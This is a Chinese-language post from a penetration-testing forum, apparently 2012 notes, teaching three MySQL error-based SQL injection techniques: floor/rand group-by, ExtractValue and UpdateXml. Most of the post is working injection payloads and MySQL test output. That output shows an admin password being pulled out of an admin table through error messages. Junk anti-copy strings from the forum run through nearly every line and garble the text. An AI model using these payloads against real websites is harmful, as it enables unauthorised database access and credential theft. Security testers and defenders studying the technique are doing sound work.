中国网络渗透测试联盟

标题: 关于Mysql注入过程中的三种报错方式 [打印本页]

作者: admin    时间: 2012-12-10 10:28
标题: 关于Mysql注入过程中的三种报错方式
放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
: f/ l# `% f9 E/ b实际测试环境:
, O& q' f1 I, d0 I* M) d
% a+ n; i' V* |6 a ! ]/ p/ I3 M. {+ b/ ~
mysql> show tables;
+ U6 O, }5 a; e+----------------+* B" c6 L) Y! y. b
| Tables_in_test |
* r( K% n! D0 s$ K2 V- ^$ Z+----------------+% q; Q( f& l5 Q  o% i7 e
| admin          |
2 j- O  Z3 K3 Q% F| article        |
# Y2 L/ N0 x. |2 B2 ?  k* g9 y+----------------+& u8 E, ~) ?) s" M

' H* c" `7 q  G: a6 J+ \1 u9 f2 c 2 `' S) I# ]( z% U7 v9 E0 X' K+ q% P

& {& h% z  P4 d( `% pmysql> describe admin;
& E& d7 r6 D/ t; X+-------+------------------+------+-----+---------+----------------+
+ C. }6 {/ O# W% o6 d| Field | Type             | Null | Key | Default | Extra          |7 q2 @+ K; Q1 `- r+ {1 [
+-------+------------------+------+-----+---------+----------------+0 ]# G7 O+ g( k% C
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |0 c. Q7 v2 D; n0 Q0 k
| user  | varchar(50)      | NO   |     | NULL    |                |
  a! u5 x( J& B6 R! Y| pass  | varchar(50)      | NO   |     | NULL    |                |* c9 l  O; i6 `( m5 ~8 K
+-------+------------------+------+-----+---------+----------------+
) U  M, m8 M0 M7 ~, }7 k . f5 [# d* v5 o; X% D& U/ D' J
% u" _' i' k/ d

& b' x4 ?$ ]$ B. q$ j( Smysql> describe article;
3 Z' w9 y3 ~4 q# U) I+---------+------------------+------+-----+---------+----------------+
% j: P0 m4 b/ O0 r0 H| Field   | Type             | Null | Key | Default | Extra          |) d; u0 T* j% f; u
+---------+------------------+------+-----+---------+----------------+, Q: ]1 j. x( {2 z
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
- O( d8 @8 v% U; M' I| title   | varchar(50)      | NO   |     | NULL    |                |
( U1 f& e! f$ b5 u1 H  n| content | varchar(50)      | NO   |     | NULL    |                |0 a7 @' _- I+ S. D8 S2 P
+---------+------------------+------+-----+---------+----------------+1 {4 }2 [& Q) D/ l) `- e
1、通过floor报错
) F% I  E; `' G: q可以通过如下一些利用代码# |# e: J- t8 G) B2 q" L6 M
' A3 S, z- N% ~( X+ P0 K

9 R0 m- }0 A4 L9 c# ~) Aand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x  r' Y) W6 \2 E0 }
from information_schema.tables group by x)a);
5 j; C* }; n6 I. j 1 Q1 |! i- t5 o* Z
5 @3 g( j9 b* I) _  P6 M" [. X
and (select count(*) from (select 1 union select null union select !1)x
0 z$ H5 @/ w7 t( egroup by concat((select table_name from information_schema.tables limit 1),
6 o- D: X- N9 b6 sfloor(rand(0)*2)));6 }# ?+ e+ @, y
举例如下:
( t% R; Z2 h% ~# `! y, C首先进行正常查询:
% i1 ~/ U* h" K8 ^# H+ W1 {5 K ' ], t5 c& n0 w0 u' ?: K8 M. r2 O
mysql> select * from article where id = 1;3 i; ^# y; f! g4 v& }7 M8 h5 Q' [  |
+----+-------+---------+
$ i9 E+ x. x) ^/ F/ U2 A| id | title | content |
4 I1 D- D+ ~  n/ k+----+-------+---------+1 i5 s7 }& w5 p* s- ~, A
|  1 | test  | do it   |7 [, C  N, s( S( l: l
+----+-------+---------+. Z; @7 ~% D4 k, f' ^, V0 U1 Z
假如id输入存在注入的话,可以通过如下语句进行报错。
! R9 W; b8 Z6 C0 t! l6 E" \ 9 Q4 g* C& k# c+ I/ e
7 |+ b7 l, P. g' I' S
mysql> select * from article where id = 1 and (select 1 from5 a4 w& S5 [* Q  r7 m6 F
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
& D9 {5 W0 ]; N* K5 D2 s" z9 {ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
  p7 K% {. Z1 `9 Z5 G/ ^可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。6 C5 Z$ H" V5 T+ O. Y0 {$ ^1 v- F
例如我们需要查询管理员用户名和密码:) P9 D, _/ y6 h9 `2 H: W
Method1:
5 P+ D+ ~4 O7 s8 d* c4 w) ?) k
# L: O/ O5 r, e# \8 ` + q4 r& w4 c2 l  n' q
mysql> select * from article where id = 1 and (select 1 from2 b& A9 h( d+ ?) W6 G  B# W
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
1 M9 d3 q% ?" L1 p4 ]from information_schema.tables group by x)a);
$ h# h) }4 J, hERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'; R( m$ X5 ~6 B) B- @/ h
Method2:
3 M6 U  T& @7 H
# |  h5 h, a0 g* Z$ C1 h+ r 2 v; w2 J4 u! t/ _: K+ Y
mysql> select * from article where id = 1 and (select count(*)
. Z6 R& `" {- ]/ R, p, X: Qfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
) G4 B: y1 k: Lfloor(rand(0)*2)));
* @2 u. s; ]+ W  z; i! l: ~ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'8 R, F; K& v2 a1 h, p* D9 }
2、ExtractValue
& b" _1 y0 {- ]/ o* |测试语句如下. l$ `- g5 Z) b) U5 m) b
3 ~& a3 s+ y- @# ~9 {7 r( [6 P

  X) }6 ?5 B0 Pand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));  |6 ?* D( Q# J- T0 B) ?
实际测试过程
/ E. P( M- r/ D* G6 S$ i - t) C* O- \5 K8 H: N! N

9 E. |1 m  f. g. b5 a7 a/ Emysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
% W. e( ^* ]$ z(select pass from admin limit 1)));--
$ \+ ^8 k- q4 E$ s3 dERROR 1105 (HY000): XPATH syntax error: '\admin888'% E6 v/ Q$ I0 K$ j0 d1 [6 j. T
3、UpdateXml$ W' x) C# Z3 c3 u; [
测试语句8 O* j& Z; D* k  a+ M2 I

+ U7 Z( k% `9 b2 `! x# Z 3 r4 |" T( p" V% j, t
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))9 F6 B1 e( w& a( B' A& P4 o, g8 E8 A
实际测试过程" S+ \4 `: z' A. ?; }& G
3 H/ j  R" \) f) d8 z- P8 n, S
9 @% H& P9 D  u! r" C8 J
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,! v  h" q  w+ h# P/ p$ S8 z
(select pass from admin limit 1),0x5e24),1));  |' n5 a! k# x2 ?  j6 j
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
6 L/ E5 p9 T% G9 GAll, thanks foreign guys.: {5 G4 l6 c* c$ A% `, y

' y% t) g; A1 c- ]- f/ O8 ]; G
1 j. K$ ?+ ?* m# J2 r  z! v




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2